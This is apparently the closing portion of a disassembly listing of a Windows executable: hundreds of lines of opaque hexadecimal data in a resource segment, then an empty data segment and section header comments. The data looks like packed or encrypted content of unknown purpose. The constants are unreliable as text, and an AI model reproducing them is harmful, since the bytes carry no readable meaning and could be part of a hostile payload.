		dd 73021F17h, 0DD927D78h, 6E0F7F8h, 884A445Dh, 1DEB9B3h
		dd 501C5F3Ch, 0F6AAA1AEh, 5B07F2F1h, 0D06A7917h, 3CE9CBD8h
		dd 934B295Ch, 15ADB5D3h, 7B350F09h, 0D78C9AFBh,	430EFEE7h
		dd 0AA7F5C41h, 2DA5DCDAh, 0F34F2E2Eh, 0E3A384ACh, 780E0673h
		dd 0AE816C6Ch, 27FDF3D3h, 0A2785F5Ch, 19DEA981h, 90241133h
		dd 92BC818Eh, 4319EF37h, 0CE647B60h, 0DE1CCE1h,	87475355h
		dd 12D8A5ADh, 7E301131h, 0F0ADF893h, 5C0AE9FEh,	0B643547Bh
		dd 5AE1DAD7h, 8B40260Fh, 0F6ADB2A8h, 78390021h,	0E89C7657h
		dd 49EAD195h, 0B4765E4Ch, 4C992C9h, 95291235h, 0C995E880h
		dd 68383D2Fh, 0F0D2223Eh, 1A90E8ECh, 0B0675F51h, 3BDDBFA7h
		dd 564C1939h, 0E8909495h, 4938E9E1h, 817F5E61h,	33FEFDACh
		dd 9A4A3611h, 10A281ADh, 68120E1Dh, 0C1B8FEBDh,	4C1BC1F7h
		dd 0B97E4772h, 21DEFFDDh, 0F1D3CD4Ch, 0E09F2ACBh, 0F4627674h
		dd 0ACD24685h, 46E09EF1h, 0BD4D627Eh, 3B7E4DC6h, 0AB168EDCh
		dd 0C18BAE81h, 0BAFB7D2Ch, 3802263Fh, 0DA69A663h, 0E31A129Eh
		dd 0B4B6164Ch, 0A2D7EB34h, 0ACE5C9E2h, 3313DD74h, 52F22F75h
		dd 5B9199FAh, 6B3A89C2h, 83C9DD4Bh, 7709193Fh, 7E7A0503h
		dd 0F20E99FCh, 0D2716D40h, 0CADD1BEh, 0FA2B0750h, 8EB5BD8Eh
		dd 7369177Ah, 2002415Dh, 49A1892Ch, 48DA606Ah, 7189E604h
		dd 59399ED8h, 8C60797Ah, 219788B5h, 0D1088994h,	849FB09Dh
		dd 3BCF1716h, 51B95D5Eh, 9ED56C59h, 0A5EBE4C5h,	0C680C779h
		dd 5C96ACDAh, 0ECA78B95h, 0F520CAC2h, 768C0BE1h, 98E8888Ah
		dd 0B0C72788h, 5F071011h, 0EAF73330h, 0E74C383Bh, 306BDEDDh
		dd 0E01A6BECh, 0B1E10F8Bh, 5402160Fh, 0AF6955B5h, 2775F9B7h
		dd 78BE3A85h, 8D0F6664h
		dd 90FF7F15h, 0B9B0BE8Ch, 0F82DC1A5h, 0DF5E4B4h, 0A1641919h
		dd 0A8C84823h, 1CDA7140h, 6664FA20h, 6285A9BCh,	861929E9h
		dd 67ADC157h, 16C00853h, 8FE5F352h, 0B6E48211h,	0B6CD0B8Fh
		dd 6A5CF7F2h, 0DE0F3912h, 14B50949h, 1C8BE499h,	0BA2DF4C2h
		dd 34BC0D41h, 0C22C1C2Ah, 95C1B084h, 0EB5A4528h, 0D3BEB29h
		dd 974D936Eh, 0CE1B8B3Eh, 3A7F9399h, 0CD48F7ADh, 0D72A87EAh
		dd 0F60B55AAh, 8BC35969h, 94E87776h, 0B1F70A02h, 8EA0679Eh
		dd 2AD4B851h, 68C7A663h, 0EAB2B91Eh, 9A1D6D2Fh,	7ABA09D6h
		dd 0E952DA9Eh, 3C7EAC3h, 70D5C157h, 798EFE4Ch, 865EA2E6h
		dd 91C9F06Ch, 0B6AEA68Dh, 0CECA26CBh, 5D49B5DFh, 32361EC0h
		dd 0A93E48B4h, 9D587141h, 6CC20D0Dh, 0C99F29DAh, 0E435DAB9h
		dd 0E54F36C0h, 2EB3416h, 53349C21h, 24699529h, 36A01110h
		dd 7B8AD34Eh, 24B8B237h, 0F0B9FDE7h, 7454523h, 9B5970FCh
		dd 0C3F58887h, 0C3081E13h, 5698D8FBh, 7ECF4443h, 7FF4F4FEh
		dd 97D590E0h, 0A7EAFBDBh, 3B15C393h, 0CF1323CFh, 37F5EDBBh
		dd 62C4184Fh, 8BFFCFC6h, 88EEBE44h, 0B2F70A0Fh,	44E1CECFh
		dd 0B21E5963h, 2EB3C7C6h, 0F3D2A408h, 0DADEC5h,	711A7407h
		dd 0BA6A4246h, 596AAABh, 0C60E8AC1h, 85BED2D0h,	3E7EBFF3h
		dd 6260A0FAh, 229A9BFAh, 0A0D9AA72h, 9F0E7B6h, 87A0B61Ch
		dd 0DFC9EDF2h, 0CA28B1F7h, 6064FA50h, 0CC85A9B2h, 824B697Ah
		dd 0E4F585ABh, 0FD4051C2h, 51E642E9h, 0D6306D17h, 0E8AD41BAh
		dd 1CC1F5F4h, 19B0C66Ah, 0F5B9FDE7h, 84F69A4h, 0B8940BF4h
		dd 0F9E17780h, 97082C30h, 7455254Fh, 2E6D4474h,	0BE44D8DCh
		dd 52591966h, 0B2908D8Bh, 226394A3h, 0DF14BDAAh, 0B2ABBC8Bh
		dd 73EEAF19h, 7458EB23h, 10647877h, 0B2F8FC8Fh,	7CB2209Eh
		dd 5A662447h, 0EABBC8F8h, 2485CBBh, 0E3FBD16Eh,	14EEC573h
		dd 0F94D5E46h, 9D1C89DFh, 0A92A79F8h, 10EE1DF9h, 5D053666h
		dd 8E276F05h, 0D238EBEh, 758B2DE3h, 0B7A2B6B6h,	0F2364AFBh
		dd 0D49AE05Fh, 9F51243Bh, 0ADF206A3h, 0ED8E5C1Ah, 51152311h
		dd 69AEC258h, 0E377669h, 9EECD645h, 256AF2F8h, 98F3BF11h
		dd 71B28684h, 94435D19h, 4816B1B9h, 89321740h, 0F4C10A8Ah
		dd 4100FDFCh, 0B40A639Dh, 2DB29E8Ah, 1376832Ch,	3AF4D6D8h
		dd 14594A7Ch, 58BFE3F7h, 0BADFC06h, 9FD51A27h, 8BF9EDEBh
		dd 0F73D5146h, 0E5A68AA7h, 7B04161Bh, 636CF20Bh, 0C38D91B2h
		dd 0E91741F2h, 9530400Fh, 53496D76h, 96DFF086h,	7C21D506h
		dd 6B91E746h, 0DF989C86h, 0D63730ABh, 0B3F384D2h, 5C043932h
		dd 3718AAABh, 364BA38Fh, 352B27A5h, 6E887A23h, 72F4B34Ah
		dd 0B6DEB053h, 0D9A67272h, 0A9D75B8Dh, 41879B71h, 389A722Dh
		dd 699FDEBCh, 0CD00EADEh, 245CEBD9h, 255B4F36h,	3574E812h
		dd 4CA397E3h, 65AC9ECBh, 748BFF8Fh, 3870F6EBh, 19E1F6C4h
		dd 3046BABFh, 4C621C95h, 0A79EB2A3h, 0DC1E2FD1h, 0DC0F31D8h
		dd 7D2C0B28h, 0F7B26763h, 52F1EFFBh, 827A4B44h,	11C5D3DEh
		dd 250D5236h, 7D802968h, 0FEE528AEh, 0B1BA6408h, 2CDCF567h
		dd 6197BB2Ah, 0D7B6FADBh, 24A5E4Dh, 6890F563h, 4C8E7A7Dh
		dd 0F30194BDh, 5299ADAAh, 0A1A0EA58h, 9EF37ED6h, 0ECFE0FCAh
		dd 917D7101h, 627CA0BEh, 35422248h, 6E882123h, 0D64CC74Ah
		dd 9E0863D6h, 9F6FB4F7h, 0ADF409A3h, 61E09CF3h,	831C302Ch
		dd 0FC4FCFABh, 0FD7474F4h, 1AD4B262h, 0B8E59033h, 0B9302426h
		dd 7DAF252Ch, 2A93C09h,	7A4320CDh, 93A3730h, 281CF19Fh
		dd 3147BBBAh, 0E94E8AE2h, 0A6CFB381h, 0DD0374F0h, 4C5224D9h
		dd 4D5B5F46h, 0A77CC384h, 3C82C310h, 0EB964D28h, 68DFE5F1h
		dd 95AAAC03h, 65D3D7C8h, 20677A39h, 0B333B181h,	0F080A39Fh
		dd 0AFAE297Dh, 6BDFD4F6h, 544B5F5Ah, 0BBFF6710h, 7C2486B3h
		dd 94EF8FE8h, 1011AE9Bh, 6CED4103h, 0A8C1AE83h,	847618ECh
		dd 9764E5B1h, 34D0C0BCh, 0CA69A4E0h, 2DC0EAD2h,	1DB483Fh
		dd 0AE600A86h, 69EA517Fh, 5DF65023h, 4D95CF11h,	0D5533599h
		dd 0E8854E11h, 0B0CEAA55h, 0AD6C64E2h, 0AD6DB14Eh, 8DB42E24h
		dd 3C959996h, 0D59C16B9h, 4DBDE1FEh, 3A615ED7h,	0EF67F7F6h
		dd 1877375h, 85B9A9DEh,	0D3A08482h, 0DE040FCBh,	0E8988CDAh
		dd 1736206Dh, 0A9F0046Ah, 0B87BCF15h, 0D1283951h, 4E5D5542h
		dd 74BF5461h, 8DE4FD9Dh, 2E9784FAh, 4B032B89h, 7B152D5Fh
		dd 0B6240804h, 26B8A6C8h, 65D99F0Ch, 13DFC3DCh,	1C43C001h
		dd 0C2E7DA18h, 54F1FFFCh, 0C412D6BFh, 0F94AD7E4h, 10675B23h
		dd 0A4802A77h, 684C6DC2h, 0FC2193DBh, 0F559BA88h, 0F40A6215h
		dd 0B8FD676Bh, 18EB7644h, 6263F52Ch, 0C88AAEB0h, 62950E7Ch
		dd 6B82F688h, 0CB5C0EDCh, 6F11060h, 275EB248h, 8B459B98h
		dd 643BAA97h, 19C895F9h, 6ACA5742h, 5A036653h, 0CEB4A9A4h
		dd 1F781874h, 385D212Fh, 6B8A7826h, 9C108A47h, 0E6F3F7E1h
		dd 7B3F1001h, 0EACB6166h, 52E0F1E5h, 0FC2B1E46h, 4AC1ADDAh
		dd 0A941647Fh, 0CB81BABFh, 572A2137h, 0DB98637Ch, 27FEE6D5h
		dd 0B14A4B41h, 2DCDA89Ah, 733F040Eh, 0EA859798h, 4C1CDBD9h
		dd 806C796Bh, 26F9D3CEh, 88601832h, 18A9B9A7h, 622A091Dh
		dd 0D782B9A1h, 551EE4F4h, 0A17C7749h, 3DDED8D0h, 9B5A3B1Eh
		dd 0EDBD8285h, 7B0C0525h, 0EC926760h, 2CFFEADDh, 0A276415Fh
		dd 1CF2A3A1h, 632E3728h, 0FBB39A8Dh, 6432F1EEh,	0BC76657Dh
		dd 4D0E5FBh, 0A1787F6Bh, 1BD79F8Ch, 63210916h, 0F7B98D9Eh
		dd 5B1DE3E5h, 8B515257h, 39D3C7C1h, 95633D26h, 0EBA0AEAEh
		dd 60182D1Eh, 0D99E6974h, 6B85EBF2h, 0B67E5F4Ah, 14C289CBh
		dd 0FB435527h, 8FD5B9E7h, 51197D7Bh, 0DB946960h, 21E5CB8Ch
		dd 0AE495744h, 1CD0E3ABh, 484D0E38h, 0BAABB7BBh, 4911E0F1h
		dd 0B5707063h, 13CFE5A4h, 0A0486410h, 5E8A9199h, 60311A4Ch
		dd 0ACD88A8Ah, 3A7F7BC7h, 4F4E2726h, 52875D57h,	99BE894Eh
		dd 8ACFD3F7h, 324EE289h, 59360B3Ah, 2FDAEB82h, 38AAB82Fh
		dd 34B3F7EEh, 746967F5h, 0AB5B88C7h, 0A1B9F7Eh,	91F3AB98h
		dd 271DAA99h, 838F693Fh, 773B5F74h, 8252564Eh, 91CECD7Ch
		dd 73F0778Dh, 3743ADDBh, 0BFA0044Eh, 0E80C486h,	0EDC9EDF1h
		dd 195D7075h, 9564FA53h, 0A985A9B4h, 0D4192DA5h, 7D04444Dh
		dd 96115564h, 6FDB83E8h, 144534E9h, 93819210h, 3AE4A1ABh
		dd 0DF2531DFh, 30FF9ECBh, 4B012571h, 86750BF3h,	2474B8ABh
		dd 0A91C68DBh, 3F74E0ADh, 14CFBBBAh, 4FEF0142h,	6798E96Bh
		dd 4F3B00FDh, 3B7F9398h, 90506174h, 2789E8F4h, 83B0303h
		dd 0BBE3FE76h, 0E6229F77h, 77AF4F4h, 46BBB361h,	0DA1E375Ah
		dd 0FB4C91C6h, 277777Bh, 96DAE306h, 782ADE82h, 0EC47405Fh
		dd 6D3F6F9h, 197C3E7Dh,	4A953B47h, 0E558E66h, 0EAB9F9FAh
		dd 652DDEC1h, 5FF27722h, 5E919E5Fh, 0A3648079h,	0EC98DEB4h
		dd 1A5D1973h, 52A74506h, 71AE680Ch, 2AE1AE2Dh, 0E4FDE2B5h
		dd 0CD6DAAC0h, 0A5864E9h, 4F694D5Ah, 0A2954311h, 1D91A5A4h
		dd 95B0C668h, 8BB9FDE0h, 3866ACF5h, 9CEB1CF4h, 63218888h
		dd 0F63B4E59h, 14D0F49Eh, 0ADA5BB44h, 68C4E8F4h, 14586C66h
		dd 0D59C7377h, 5DF4FAFAh, 30442866h, 5383652Eh,	12B9D94Fh
		dd 84D0D4C8h, 4DE9F546h, 3BF83C12h, 76A0571Bh, 4FDF6532h
		dd 6E84E487h, 24C34C9h,	2356EFEEh, 2A5F9ADDh, 63BE9A4Fh
		dd 0BA979B86h, 19D4CDC2h
		dd 0DE3A14B4h, 0E535746h, 44379AAh, 367ABEAEh, 0EA6AB7AFh
		dd 0AF2B686h, 0F25C4B20h, 86C8B68Ch, 8FA1F272h,	0ADC22AE7h
		dd 34DC5A1Ch, 4297A30Fh, 3BAEF2E1h, 48CF503Fh, 91E6CA4Dh
		dd 753A2829h, 2D014040h, 4CA28A41h, 3DB3C560h, 0B2BAFEE0h
		dd 38609CE5h, 0F209F5F4h, 0CF8A767Ah, 0F41B6091h, 141876B0h
		dd 0BA317551h, 68F6868Ch, 0EBA69F35h, 0B2A184C7h, 6FD795A3h
		dd 85FD1D78h, 0A4564249h, 0C7281DCAh, 0D4A9B3E3h, 0ED5E9143h
		dd 373EF2F4h, 46BDB4D2h, 8E575064h, 0EB3800F5h,	2796D15h
		dd 0C78DA1BFh, 7B21D5D2h, 92318DE9h, 0C767AC9Ah, 0E61C6C13h
		dd 0FDF3C13h, 0E588012h, 0EAB4FBFAh, 663AD8C2h,	864B0D6Bh
		dd 0CB5CB7FAh, 0F207670Bh, 86CBD336h, 49172072h, 0CCA57363h
		dd 0E2EEF5h, 40E47F2Dh,	699FE818h, 2F6DAC6h, 0F9D7DBC5h
		dd 256B7FB5h, 47FF7947h, 7CBFBE31h, 32B2B638h, 0F9BBFFD3h
		dd 3862A4DDh, 0CBB0A0F4h, 1B931F77h, 891E2Ch, 0B70B3FBCh
		dd 0BC32765Bh, 0D6C7B08Fh, 1458063Eh, 74118200h, 0C4788B7Bh
		dd 0FDABA9D8h, 63AA8EAEh, 7F56593Bh, 74D2E6F0h,	2F4A13E2h
		dd 0B2F6E60Bh, 15D9A29Eh, 0E969757Dh, 22F2E4F4h, 97B55E16h
		dd 96EDDDAFh, 2A76ED11h, 0B881916h, 52A9B51Ch, 4B90CC67h
		dd 92C1E5FEh, 0F1AA98EAh, 0A2E8F012h, 7835C78Eh, 9E556A6Bh
		dd 12E8FC98h, 0B3ADB34Ah, 3CCD0F2h, 2FE47BB2h, 3EF40804h
		dd 418899F1h, 21A9BD2Dh, 30B0F4D9h, 0D18DE5D8h,	0C430ECD9h
		dd 0A6937F8Ch, 892CD9ACh, 0C99BA8A5h, 0E1283E29h, 742C3C4Ch
		dd 61046461h, 9DE3F6F4h, 1DDA1E76h, 18A1F2Dh, 599FB221h
		dd 87E7CC15h, 143889D9h, 156B43A0h, 0DDB6C384h,	2F0BFF99h
		dd 45E82B28h, 649B93D5h, 45BCB1BBh, 8CE3C742h, 0AD4E0E78h
		dd 83DBA589h, 0D270F39Fh, 0DB131B8Ah, 0EBB80B42h, 34B5ED2h
		dd 1CD2B264h, 0A4427983h, 8F26BC92h, 0AD1F68ABh, 0E62E7211h
		dd 7AA8D6B9h, 9AA9680Dh, 0A3D9D13Eh, 3882690Ch,	0CB1045A7h
		dd 0CA282AB7h, 0F3096DE9h, 0D49FF1B5h, 37D4E08Ch, 6E700937h
		dd 43C91895h, 6B90312Eh, 6A81E506h, 8FAD51E7h, 0FA26121Ch
		dd 266D81EAh, 33E73E4Ch, 0B1C18D92h, 0D2050CAFh, 0A4005CCEh
		dd 0BB515542h, 68B610F7h, 0A7F57375h, 0C63C00A1h, 4EC8B4D8h
		dd 0BC344846h, 435D2389h, 9B5C4042h, 24E42046h,	0DB4D700h
		dd 67177C29h, 41E84BB7h, 0F1A09545h, 9FD5A2E7h,	6B7A7E33h
		dd 90B81B0Eh, 477124A8h, 8D2CD8F5h, 609C88C3h, 891C52A3h
		dd 0A8F30C4Dh, 2C6F6F84h, 0EE221B18h, 7ABBD79Ah, 0D20F6D60h
		dd 52E6F2F1h, 68721350h, 0AE99DBDCh, 7637DDDAh,	33452604h
		dd 508D5F2Dh, 58FECF4Ch, 0E2CEE2E0h, 4F352674h,	83379FF7h
		dd 0CE019EABh, 0D72E271Dh, 7051C6A9h, 0AE4B933Ch, 93DAEB03h
		dd 434BA47Fh, 44551619h, 7FBD4F32h, 0EFEEBD3Bh,	1FB5399Fh
		dd 0B52666Bh, 0BF3D447Ah, 602E8DBBh, 0EBCCB4E0h, 9B24B583h
		dd 5AB81D39h, 83F9F124h, 26FD4ECh, 27F10533h, 0EAB671Bh
		dd 0B8D7062Ah, 35FB90BEh, 0D6FCC0ADh, 7656E9D6h, 0B346037Ah
		dd 70EF85h, 49A1895Eh, 73D73485h, 99D9DDBCh, 0FAB29707h
		dd 7AF78690h, 2C03058Ch, 0E83F6F2h, 0E8117E86h,	0E90068BEh
		dd 8A437C26h, 0EE0BD582h, 95C74E68h, 56C21391h,	0CC131730h
		dd 51CF91CDh, 0A3B4F38h, 0B9E38A74h, 0E3DEF775h, 0B0F73B27h
		dd 0C14C8EE8h, 0D82F1396h, 6CB3C7C4h, 2EB9DE9Eh, 7DDAEEDCh
		dd 0D7917C88h, 0BC06D449h, 7E691F25h, 1B7C3E0Ch, 4892DF45h
		dd 0F3AAE564h, 0A05E7DF7h, 0B1F08D8Ch, 0C83D1123h, 0A3F7B5DEh
		dd 0C01914DDh, 8B0958DCh, 185DD5F4h, 0FB312E04h, 6F86F3C7h
		dd 0D3712C41h, 316DC1BFh, 0D0B0C0ACh, 7756E9D7h, 11ED7284h
		dd 3FFD110Bh, 7AA1A227h, 0D5A8B436h, 0FFB9FDFAh, 367D72CBh
		dd 0F0B2A5F2h, 0BB8BD886h, 0C238300Fh, 5963482Dh, 0EA3444C6h
		dd 81C4B2D6h, 22686BDFh, 0B77E00FEh, 0B97FA3BEh, 4A1CD8DEh
		dd 62A7B853h, 0C620CAC7h, 43FCE3D2h, 4E32B475h,	0E0F3615Bh
		dd 758C2A62h, 4CE03301h, 6D83EC30h, 85489BDCh, 95DAED28h
		dd 0ACE74BB2h, 0BD32260Ah, 39C7FBF8h, 0E5253E22h, 3C2B2D81h
		dd 88525649h, 0DF61F639h, 0BC798D8Eh, 0F93D02A4h, 162A76B5h
		dd 9166F171h, 57FADDDDh, 0E8AAB072h, 2978E4F2h,	40B5A9B7h
		dd 6C2566A7h, 68ADDA0Ch, 3D428767h, 7122181Fh, 144EF8F5h
		dd 0B83E1120h, 0B297EE14h, 8CA80FD4h, 300EC2D3h, 4E9D624Bh
		dd 98C83598h, 704E0957h, 3A66756Ch, 0D4D5AEDBh,	99314839h
		dd 438F5308h, 104C2EE0h, 0E366EFBDh, 0E2886CDBh, 4A28E604h
		dd 63978BA0h, 0B3B0168Ch, 346EFC7h, 1F6377CFh, 8334CB38h
		dd 76A5A8ACh, 0EB31031Ch, 25C789E6h, 722B3528h,	0F8B3C08Fh
		dd 2063EDE4h, 0D86B2A35h, 37FBCBD8h, 85584D1Eh,	0ED6F0EFh
		dd 21681612h, 0E991B7D5h, 4615E3FCh, 0A4640F43h, 2C8EDAD0h
		dd 9B0A6629h, 0A6EBECE3h, 6E391805h, 8DC0386Eh,	26ECFCF1h
		dd 0E4245945h, 10D9B2E1h, 0DF7C3039h, 0F5A7868Bh, 15530F18h
		dd 97C12F33h, 2DE3C3CDh, 0ED1B5C55h, 0FF4746C6h, 387D7AEDh
		dd 1FAE44F4h, 9E868C61h, 0FB891569h, 36EEFBC4h,	67F3B031h
		dd 9B495326h, 0A4585C5Ch, 0A205833Ch, 0D5F53A61h, 0BA3B17A7h
		dd 62EF374Ch, 28E38F6Ah, 0C492D93Ch, 0F7112133h, 5A062744h
		dd 468CA2B2h, 0DA206C5Ah, 9F5C93C6h, 76B7A3A7h,	8D5664CEh
		dd 0A76FB3B2h, 71281622h, 61AB26E4h, 618FCCC3h,	7BC15E0Bh
		dd 29E6D2EBh, 511AFACAh, 0F9F14D2Ah, 778329C9h,	5E929849h
		dd 0C1E9C1B6h, 0E7F67217h, 60627400h, 8DDE0471h, 35DAA633h
		dd 0A13412C1h, 1CAEFE1Ch, 767FB5BDh, 0C2532CE8h, 256A4E4Dh
		dd 0FDA6572Ch, 71A0D2A4h, 0E074796Bh, 8B9FE5B8h, 354E9D9Fh
		dd 9CACA1BCh, 60489BFCh, 0B0094D54h, 0BDC8CBBh,	693E4514h
		dd 7F3A2799h, 240AE892h, 94060130h, 0C47F0A7Ah,	0F216A2D8h
		dd 20E7F4ECh, 91AD540h,	0DCEC1A1Ch, 102B2C34h, 4D07118Fh
		dd 5DA9C61h, 5E2E0701h,	914A37D7h, 561A0D67h, 9058FFA1h
		dd 198F7B7Ch, 432AF0CDh, 0D6975355h, 19D3BDC7h,	6C2806E1h
		dd 0E6546866h, 5D1805A3h, 367B8F66h, 278E7E22h,	5E939E8Fh
		dd 0F23679A3h, 0B434BBDEh, 2A7CC6F9h, 24970736h, 123A1BBBh
		dd 0D41B1F1Dh, 0C747C9B4h, 14BCA8ABh, 91D7EAFAh, 6855FE1Bh
		dd 0B07A1C4Bh, 0C793A7A5h, 3E240766h, 24804EAAh, 0F0CA6C25h
		dd 6BE2F6F4h, 10769CCBh, 41051E1Ch, 589EB25Bh, 0EE6E05B2h
		dd 80275ED7h, 6ADB6E6Ch, 87CE2220h, 0EF0699B3h,	27162A27h
		dd 9C55431Ch, 0F7F7D040h, 0C959E6E3h, 0F2CF17Fh, 0B689CF20h
		dd 436562ADh, 90ABFE31h, 453343D6h, 0EA4A6E6Ah,	69220CB8h
		dd 2A712A6Ah, 99989216h, 51999D9Ah, 0D61D6AA3h,	86AF3DD2h
		dd 8A5A9699h, 0A2E8FC75h, 65F2505h, 949B2412h, 0B67ABB8Ah
		dd 0DC7B11Dh, 0CC4D9DACh, 1A601456h, 0FB0A83E6h, 0CC9CE69Ah
		dd 0E50C3098h, 79CAC7C1h, 0FD42ABECh, 342BBBE9h, 278F81CCh
		dd 0E75FB0E2h, 0DFA5A7F7h, 0E1AABBB4h, 0FCDAD0CDh, 0F6AFFFF1h
		dd 78331F0Ah, 0BA2D7476h, 8F081357h, 5FDE3EA1h,	641B046Eh
		dd 81C7845Eh, 351DA86Dh, 88CF2321h, 0B7ABDC1Dh,	559C3B62h
		dd 649B8F9Bh, 8B371969h, 84996EE7h, 0A3773979h,	38FB576Fh
		dd 77BF8C1Ah, 0D3613633h, 5CE788C6h, 21C03B89h,	0CFDC7D8Bh
		dd 1B753B00h, 0B0061A27h
		dd 0AC663A2Fh, 0C49BBDC0h, 84C2E6E3h, 3F7A07F2h, 0BC5C02FBh
		dd 0C87DA1BFh, 0FB3AE8B6h, 542834B7h, 7E397D7Bh, 0B7FDF24Ah
		dd 71332473h, 0A940F607h, 0BD89ADAAh, 0E63154BBh, 6D043AC2h
		dd 1456966h, 0A2F2207Fh, 0D9D80C7Eh, 4501253Ch,	7EA5AA13h
		dd 77D66B3Ah, 768DFD93h, 3A56C0E1h, 5DE4F8C6h, 32788C62h
		dd 0C7667D1Eh, 704D5933h, 1E6C4876h, 0FA4D1DD5h, 935C407Bh
		dd 6173C7C2h, 0FC8B686Ah, 0E10D54ACh, 759103BDh, 8C407E51h
		dd 0F1558EF9h, 5004705Dh, 5C9C0378h, 0B76F5B64h, 87CC3D41h
		dd 98473335h, 0FBB39F8Eh, 0B520DD91h, 3E47D1FCh, 0C0073EA0h
		dd 0F173CFACh, 9DD0BCBFh, 58875CEDh, 0EFE2E658h, 2FEACED2h
		dd 0B9189AC0h, 0BF10201Eh, 60CEEC9Dh, 7F3AB14Ch, 0DACE8824h
		dd 0B5F78924h, 2CF63A24h, 7D0B965Fh, 8B210D73h,	0AD31C5B6h
		dd 24EB253h, 0EC321114h, 46917D80h, 0BB76AED0h,	0FE7DAAA7h
		dd 0E32A1183h, 77AE3ACFh, 2B906663h, 9FD541F7h,	30918D8Bh
		dd 50D211Fh, 0F2CB597h,	0C1F84563h, 0FFC92558h,	17B51176h
		dd 21F10503h, 63B5BDC2h, 3F9837A1h, 669DEA09h, 5AF52BAh
		dd 8A178819h, 150Dh dup(0)
_rsrc		ends

; Section 4. (virtual address 00012000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00012000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 1012000h
		dd 80h dup(0)
		align 1000h
_idata2		ends


		end start